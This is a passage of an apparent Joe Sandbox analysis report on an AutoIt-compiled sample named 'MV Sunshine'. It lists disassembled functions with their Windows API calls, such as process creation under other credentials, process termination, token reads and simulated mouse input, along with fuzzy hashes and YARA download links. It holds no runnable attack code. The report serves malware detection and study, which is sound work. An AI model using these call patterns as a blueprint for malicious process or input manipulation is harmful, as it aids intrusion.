Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 436edc868300fcffcbc328d12de4ec282420a528c7b703c5f126b01b9babbee5
Instruction ID: ca139d1a715e353de4df4d953e8eefeae44dd6c35ee3cefb4136350abe79ab58
Opcode Fuzzy Hash: 436edc868300fcffcbc328d12de4ec282420a528c7b703c5f126b01b9babbee5
Instruction Fuzzy Hash: 115190B0A00207EFDF24EF68D898AEEBBF6EF45314F104369E8119B291D7709949CB51

Function 00621765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0062179A
GetWindowRect.USER32(?,?), ref: 006217FE
ScreenToClient.USER32(?,?), ref: 0062181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0062182C
EndPaint.USER32(?,?), ref: 00621876

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 2630706b3fccf40054639406fa44a0eb0d70952b2703a4b3360f8b9e64ea8edd
Instruction ID: 9e4c26dbb09f0cceb43837e82e3caa6ed4796f84982cbdd8b93fc8afbfa3b67a
Opcode Fuzzy Hash: 2630706b3fccf40054639406fa44a0eb0d70952b2703a4b3360f8b9e64ea8edd
Instruction Fuzzy Hash: 3541B070104751AFC710DF24DCC4BBB7BEAEB66764F140668F9948A2A1C731A845DF62

Function 006AB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(006E67B0,00000000,00BD4B10,?,?,006E67B0,?,006AB862,?,?), ref: 006AB9CC
EnableWindow.USER32(00000000,00000000), ref: 006AB9F0
ShowWindow.USER32(006E67B0,00000000,00BD4B10,?,?,006E67B0,?,006AB862,?,?), ref: 006ABA50
ShowWindow.USER32(00000000,00000004,?,006AB862,?,?), ref: 006ABA62
EnableWindow.USER32(00000000,00000001), ref: 006ABA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 006ABAA9

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: efc2247b30c1d91939385ea52aff2f30b0340ab16a482a9fcade70e69ff390f5
Instruction ID: 48d64dd62509912cdb98ea7e7db43f74ce8ae806fae6c8b2fd3954c2ae5c2b5b
Opcode Fuzzy Hash: efc2247b30c1d91939385ea52aff2f30b0340ab16a482a9fcade70e69ff390f5
Instruction Fuzzy Hash: E8412931600241AFDB22EF64D499BD57BA2EF07310F1852A9FA488F6A3C731AC45CF51

Function 006973B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00695134,?,?,00000000,00000001), ref: 006973BF

Part of subcall function 00693C94: GetWindowRect.USER32(?,?), ref: 00693CA7

GetDesktopWindow.USER32 ref: 006973E9
GetWindowRect.USER32(00000000), ref: 006973F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00697422

Part of subcall function 006854E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0068555E

GetCursorPos.USER32(?), ref: 0069744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006974AC

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: c8f41aab90215168100cb55d1587d673b22c5c4c8b06c86ade078cf49e74e7b1
Instruction ID: 53147c97dcea37d4b6b59015fbf46866d1aad8ef809a3bb1e66a471a6ff16a3f
Opcode Fuzzy Hash: c8f41aab90215168100cb55d1587d673b22c5c4c8b06c86ade078cf49e74e7b1
Instruction Fuzzy Hash: F331E672508305ABDB24EF54D849F9BBBEEFF89714F000919F58997192DB30E908CB92

Function 00678D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006785F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00678608
Part of subcall function 006785F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00678612
Part of subcall function 006785F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00678621
Part of subcall function 006785F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00678628
Part of subcall function 006785F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0067863E

GetLengthSid.ADVAPI32(?,00000000,00678977), ref: 00678DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00678DB8
HeapAlloc.KERNEL32(00000000), ref: 00678DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00678DD8
GetProcessHeap.KERNEL32(00000000,00000000,00678977), ref: 00678DEC
HeapFree.KERNEL32(00000000), ref: 00678DF3

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: d07bd2e23d296dc2c15d0f4796e4a6916e41fc4a79bdad3dff747873567bab8f
Instruction ID: 5dfde0989437ca48ce94fac7e451186b15a177d592f844c0314cd589fcb9f583
Opcode Fuzzy Hash: d07bd2e23d296dc2c15d0f4796e4a6916e41fc4a79bdad3dff747873567bab8f
Instruction Fuzzy Hash: 6E119A31640605EFDB20ABA4CC0DBAEBBAAEF56315F108029E84997250CB32AD00CF60

Function 00678AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00678B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00678B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00678B40
CloseHandle.KERNEL32(00000004), ref: 00678B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00678B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00678B8E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 3b8057cb75608b99c534bb8ef083008e17fe207b56640a301da7e04e80f25262
Instruction ID: 3c18cc337248d3bd9bd9d4fbe85a1d2a5fc63b4857885815b29d0eebbcf64090
Opcode Fuzzy Hash: 3b8057cb75608b99c534bb8ef083008e17fe207b56640a301da7e04e80f25262
Instruction Fuzzy Hash: FD1159B2540209AFDF019FE4ED49FDA7BAAEF09704F049064FE08A2160C7729D60AB61

Function 006AC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 006212F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0062134D
Part of subcall function 006212F3: SelectObject.GDI32(?,00000000), ref: 0062135C
Part of subcall function 006212F3: BeginPath.GDI32(?), ref: 00621373
Part of subcall function 006212F3: SelectObject.GDI32(?,00000000), ref: 0062139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 006AC1C4
LineTo.GDI32(00000000,00000003,?), ref: 006AC1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 006AC1E6
LineTo.GDI32(00000000,00000000,?), ref: 006AC1F6
EndPath.GDI32(00000000), ref: 006AC206
StrokePath.GDI32(00000000), ref: 006AC216

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: c8a9fdc50ab8270637c83e239b5c83a9a881e33b03e2081ea71c3f90c28e981b
Instruction ID: 3739ac017f7fd7ce914bf2f595b666ec74b810902d427d1d3bd2ccc902bb2185
Opcode Fuzzy Hash: c8a9fdc50ab8270637c83e239b5c83a9a881e33b03e2081ea71c3f90c28e981b
Instruction Fuzzy Hash: B0110C7640014CBFDB11AF94DC88FDA7FAEEB05394F048021B9194A161C771AE55DFA0

Function 006403A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 006403D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 006403DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 006403E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 006403F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 006403F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00640401

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: d7d16e1cfe0facd87f7546e9b105cad5cc9d3cc573c800b72ee1b4386cfa2dcb
Instruction ID: 9b170cead01816f48775bddff2091ed510237b8129ec6e92bc15075a8bf64a23
Opcode Fuzzy Hash: d7d16e1cfe0facd87f7546e9b105cad5cc9d3cc573c800b72ee1b4386cfa2dcb
Instruction Fuzzy Hash: 15016CB09017597DE3009F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CFE5

Function 0068568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0068569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006856B1
GetWindowThreadProcessId.USER32(?,?), ref: 006856C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006856CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006856D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006856E0

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 939fd405aa3fe686849e6b71365c9f2e7d73dc10746b32b84c31d1626cd400bb
Instruction ID: f631f163280f8d2c734c56ea97b9753449508b149387fd9a7856c081d06a850b
Opcode Fuzzy Hash: 939fd405aa3fe686849e6b71365c9f2e7d73dc10746b32b84c31d1626cd400bb
Instruction Fuzzy Hash: 22F01D32241158BBE7216BE2DC0DEEB7A7DEBC7B11F001169FA05D10609AA12A018AB6

Function 006874D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 006874E5
EnterCriticalSection.KERNEL32(?,?,00631044,?,?), ref: 006874F6
TerminateThread.KERNEL32(00000000,000001F6,?,00631044,?,?), ref: 00687503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00631044,?,?), ref: 00687510

Part of subcall function 00686ED7: CloseHandle.KERNEL32(00000000,?,0068751D,?,00631044,?,?), ref: 00686EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00687523
LeaveCriticalSection.KERNEL32(?,?,00631044,?,?), ref: 0068752A

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 82efacc6de67814584512cc27de4b84f8d9db9da01fe4d8b1d5eefa2f78200c7
Instruction ID: c9d1e2b8f7b8b6c373021606b5c7d1d6d404052c17e4a3011edf10725a1718c2
Opcode Fuzzy Hash: 82efacc6de67814584512cc27de4b84f8d9db9da01fe4d8b1d5eefa2f78200c7
Instruction Fuzzy Hash: 03F05E3A144612EBDB613BE4FC8CAEB772BEF46302B101631F202910B0DB756A01CF52

Function 00678E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00678E7F
UnloadUserProfile.USERENV(?,?), ref: 00678E8B
CloseHandle.KERNEL32(?), ref: 00678E94
CloseHandle.KERNEL32(?), ref: 00678E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00678EA5
HeapFree.KERNEL32(00000000), ref: 00678EAC

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: c05b8c43f7f1217fb6d225d4daa9ea8026ff6902dc885d6fe52d05196a9ade90
Instruction ID: ff11aa5dace3475f7f71ecd2301c3ce310222860071742df050faab2bb6fd243
Opcode Fuzzy Hash: c05b8c43f7f1217fb6d225d4daa9ea8026ff6902dc885d6fe52d05196a9ade90
Instruction Fuzzy Hash: 9AE05276104505FFDB012FE5EC0C95ABB6AFB8A762B509631F21981470CB32A861DF92

Function 00677A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,006B2C7C,?), ref: 00677C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,006B2C7C,?), ref: 00677C4A
CLSIDFromProgID.OLE32(?,?,00000000,006AFB80,000000FF,?,00000000,00000800,00000000,?,006B2C7C,?), ref: 00677C6F
_memcmp.LIBCMT ref: 00677C90

Strings

,,k, xrefs: 00677A85

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,k
API String ID: 314563124-759674344
Opcode ID: 0b897102bf7b59b801b3bd78249e00269e3f2c4cd4bb5c90ce092925b9ce4cd8
Instruction ID: e70d52fef702a94f8f56b98616a8165eac6db28a23e8f57dfa8294394ef005cf
Opcode Fuzzy Hash: 0b897102bf7b59b801b3bd78249e00269e3f2c4cd4bb5c90ce092925b9ce4cd8
Instruction Fuzzy Hash: 59811B75A00109EFCB04DF94C984DEEB7BAFF89715F208198E516AB250DB71AE06CB61

Function 00698902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00698928
CharUpperBuffW.USER32(?,?), ref: 00698A37
VariantClear.OLEAUT32(?), ref: 00698BAF

Part of subcall function 00687804: VariantInit.OLEAUT32(00000000), ref: 00687844
Part of subcall function 00687804: VariantCopy.OLEAUT32(00000000,?), ref: 0068784D
Part of subcall function 00687804: VariantClear.OLEAUT32(00000000), ref: 00687859

Strings

AUTOIT.ERROR, xrefs: 00698A3D
Incorrect Parameter format, xrefs: 00698960, 00698B22

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: c06a19a9c45a03d106468f230b05d00612bad830a84f0d3573f174f3b97eb845
Instruction ID: d600c82bf67cd1c5c47d5b6d45f3a0d91eff7e1a93ffd7f42431f7f4ce1c755b
Opcode Fuzzy Hash: c06a19a9c45a03d106468f230b05d00612bad830a84f0d3573f174f3b97eb845
Instruction Fuzzy Hash: AC9180716087019FCB50DF28C48195ABBEAEFC9314F14896EF89A8B361DB31E945CB52

Function 00682F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0063FEC6: _wcscpy.LIBCMT ref: 0063FEE9

_memset.LIBCMT ref: 00683077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006830A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00683159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00683187

Strings

0, xrefs: 00683063

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 5a9442fa51a182338c427dc7d73c1e383cf088b6cf409e7a5eb7a189b0881862
Instruction ID: 275e7ac173122368abaa191a1262557114efd0591c4c7f8b5341fa7d21a1fb40
Opcode Fuzzy Hash: 5a9442fa51a182338c427dc7d73c1e383cf088b6cf409e7a5eb7a189b0881862
Instruction Fuzzy Hash: B951EF316083209AD765BF28C849AABBBE6AF55F50F040B2DF8C5D7390DB70CA448B56

Function 00682C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00682CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00682CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00682D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006E6890,00000000), ref: 00682D5A

Strings

0, xrefs: 00682CA4

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 6981966ae49cb01b37e546307ea74b85ad297bd88c3c96a40fb4e1fd10b49234
Instruction ID: 2c9cc931f827a3fd3ff9dde97e76860d50aee89981416e68d370b7cb5d54480d
Opcode Fuzzy Hash: 6981966ae49cb01b37e546307ea74b85ad297bd88c3c96a40fb4e1fd10b49234
Instruction Fuzzy Hash: D941A0702053029FD720EF24C855B5ABBEAFF85320F144A1DF965973A1D770E905CBA6

Function 0069DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0069DAD9

Part of subcall function 006279AB: _memmove.LIBCMT ref: 006279F9

Strings

stdcall, xrefs: 0069DB5B
none, xrefs: 0069DBB4
winapi, xrefs: 0069DB4A
cdecl, xrefs: 0069DB30

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 990bf2341585312a59368a96f3c3c1b29ccceefc875e6317aa8bf8258f8407cd
Instruction ID: cab9ba2f61e32651b49d59a3f1057e48428daaeceaf90f336370f0acfef7cec1
Opcode Fuzzy Hash: 990bf2341585312a59368a96f3c3c1b29ccceefc875e6317aa8bf8258f8407cd
Instruction Fuzzy Hash: 9531967190061AAFCF10EF94CC819EEB7BAFF05310B10862EE86597BD5DB71A905CB94

Function 00679372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

Part of subcall function 0067B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0067B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006793F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00679409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00679439

